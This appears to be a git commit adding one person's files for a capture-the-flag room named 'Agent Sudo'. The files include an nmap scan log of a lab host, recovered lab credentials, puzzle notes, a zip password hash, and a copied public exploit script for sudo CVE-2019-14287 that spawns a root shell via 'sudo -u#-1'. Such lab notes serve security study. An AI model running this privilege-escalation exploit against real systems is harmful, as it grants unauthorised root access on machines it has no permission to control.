diff options
| author | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-17 21:21:29 -0400 |
|---|---|---|
| committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-09-17 21:21:29 -0400 |
| commit | 8e07e852ee302516e02e8d2773ca45538c28910e (patch) | |
| tree | cd44dea18d253069cb5f83b6f022e30a20a5c858 | |
| parent | a28bbfd309eba3222d9938d9b3ce185fd1e8241e (diff) | |
add agent_sudo
| -rw-r--r-- | agent_sudo/47502.py | 80 | ||||
| -rw-r--r-- | agent_sudo/Alien_autospy.jpg | bin | 0 -> 42189 bytes | |||
| -rw-r--r-- | agent_sudo/README.md | 6 | ||||
| -rw-r--r-- | agent_sudo/To_agentJ.txt | 6 | ||||
| -rw-r--r-- | agent_sudo/_cutie.png.extracted/365 | bin | 0 -> 279312 bytes | |||
| -rw-r--r-- | agent_sudo/_cutie.png.extracted/365.zlib | bin | 0 -> 33973 bytes | |||
| -rw-r--r-- | agent_sudo/_cutie.png.extracted/8702.zip | bin | 0 -> 280 bytes | |||
| -rw-r--r-- | agent_sudo/_cutie.png.extracted/To_agentR.txt | 6 | ||||
| -rw-r--r-- | agent_sudo/cute-alien.jpg | bin | 0 -> 33143 bytes | |||
| -rw-r--r-- | agent_sudo/cutie.png | bin | 0 -> 34842 bytes | |||
| -rw-r--r-- | agent_sudo/forjohn_zip | 1 | ||||
| -rw-r--r-- | agent_sudo/message.txt | 8 | ||||
| -rw-r--r-- | agent_sudo/nmap | 25 |
13 files changed, 132 insertions, 0 deletions
diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py new file mode 100644 index 0000000..907d29a --- /dev/null +++ b/agent_sudo/47502.py @@ -0,0 +1,80 @@ +# Exploit Title : sudo 1.8.27 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : Sudo <1.8.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : 2019-14287
+
+'''Check for the user sudo permissions
+
+sudo -l
+
+User hacker may run the following commands on kali:
+ (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT:
+
+sudo -u#-1 /bin/bash
+
+Example :
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file diff --git a/agent_sudo/Alien_autospy.jpg b/agent_sudo/Alien_autospy.jpg Binary files differnew file mode 100644 index 0000000..b82c847 --- /dev/null +++ b/agent_sudo/Alien_autospy.jpg diff --git a/agent_sudo/README.md b/agent_sudo/README.md new file mode 100644 index 0000000..e20e876 --- /dev/null +++ b/agent_sudo/README.md @@ -0,0 +1,6 @@ +> creds +``` +ftp: chris:crystal +zip: alien +james:hackerrules! +``` diff --git a/agent_sudo/To_agentJ.txt b/agent_sudo/To_agentJ.txt new file mode 100644 index 0000000..8cd771b --- /dev/null +++ b/agent_sudo/To_agentJ.txt @@ -0,0 +1,6 @@ +Dear agent J, + +All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you. + +From, +Agent C diff --git a/agent_sudo/_cutie.png.extracted/365 b/agent_sudo/_cutie.png.extracted/365 Binary files differnew file mode 100644 index 0000000..0a09622 --- /dev/null +++ b/agent_sudo/_cutie.png.extracted/365 diff --git a/agent_sudo/_cutie.png.extracted/365.zlib b/agent_sudo/_cutie.png.extracted/365.zlib Binary files differnew file mode 100644 index 0000000..be7e8d6 --- /dev/null +++ b/agent_sudo/_cutie.png.extracted/365.zlib diff --git a/agent_sudo/_cutie.png.extracted/8702.zip b/agent_sudo/_cutie.png.extracted/8702.zip Binary files differnew file mode 100644 index 0000000..ead18d3 --- /dev/null +++ b/agent_sudo/_cutie.png.extracted/8702.zip diff --git a/agent_sudo/_cutie.png.extracted/To_agentR.txt b/agent_sudo/_cutie.png.extracted/To_agentR.txt new file mode 100644 index 0000000..732bb92 --- /dev/null +++ b/agent_sudo/_cutie.png.extracted/To_agentR.txt @@ -0,0 +1,6 @@ +Agent C, + +We need to send the picture to 'QXJlYTUx' as soon as possible! + +By, +Agent R diff --git a/agent_sudo/cute-alien.jpg b/agent_sudo/cute-alien.jpg Binary files differnew file mode 100644 index 0000000..1780a48 --- /dev/null +++ b/agent_sudo/cute-alien.jpg diff --git a/agent_sudo/cutie.png b/agent_sudo/cutie.png Binary files differnew file mode 100644 index 0000000..6e51f7c --- /dev/null +++ b/agent_sudo/cutie.png diff --git a/agent_sudo/forjohn_zip b/agent_sudo/forjohn_zip new file mode 100644 index 0000000..bac0057 --- /dev/null +++ b/agent_sudo/forjohn_zip @@ -0,0 +1 @@ +8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip diff --git a/agent_sudo/message.txt b/agent_sudo/message.txt new file mode 100644 index 0000000..090aa63 --- /dev/null +++ b/agent_sudo/message.txt @@ -0,0 +1,8 @@ +Hi james, + +Glad you find this message. Your login password is hackerrules! + +Don't ask me why the password look cheesy, ask agent R who set this password for you. + +Your buddy, +chris diff --git a/agent_sudo/nmap b/agent_sudo/nmap new file mode 100644 index 0000000..7a021cd --- /dev/null +++ b/agent_sudo/nmap @@ -0,0 +1,25 @@ +# Nmap 7.92 scan initiated Sat Sep 17 05:55:05 2022 as: nmap -vvv -p 21,22,80 -sC -sV -oN nmap 10.10.14.85 +Nmap scan report for 10.10.14.85 +Host is up, received conn-refused (0.14s latency). +Scanned at 2022-09-17 05:55:05 EDT for 15s + +PORT STATE SERVICE REASON VERSION +21/tcp open ftp syn-ack vsftpd 3.0.3 +22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA) +| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r +| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA) +| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68= +| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519) +|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt +80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) +|_http-title: Annoucement +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +|_http-server-header: Apache/2.4.29 (Ubuntu) +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Sep 17 05:55:20 2022 -- 1 IP address (1 host up) scanned in 15.26 seconds |
